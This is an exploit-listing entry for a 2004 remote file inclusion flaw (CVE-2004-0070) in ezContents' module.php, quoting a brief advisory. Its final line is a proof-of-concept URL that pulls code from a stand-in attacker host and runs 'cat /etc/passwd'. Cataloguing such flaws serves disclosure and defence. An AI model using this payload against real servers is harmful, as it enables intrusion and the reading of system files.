VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution
| EKU-ID: 28977 | CVE: CVE-2004-0070;OSVDB-6878 | OSVDB-ID: |
| Author: Zero X | Published: 2004-01-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28977 | CVE: CVE-2004-0070;OSVDB-6878 | OSVDB-ID: |
| Author: Zero X | Published: 2004-01-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9396/info A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems. http://www.example.com/module.php?link=http://attacker.example.com/index.php&cmd=cat /etc/passwd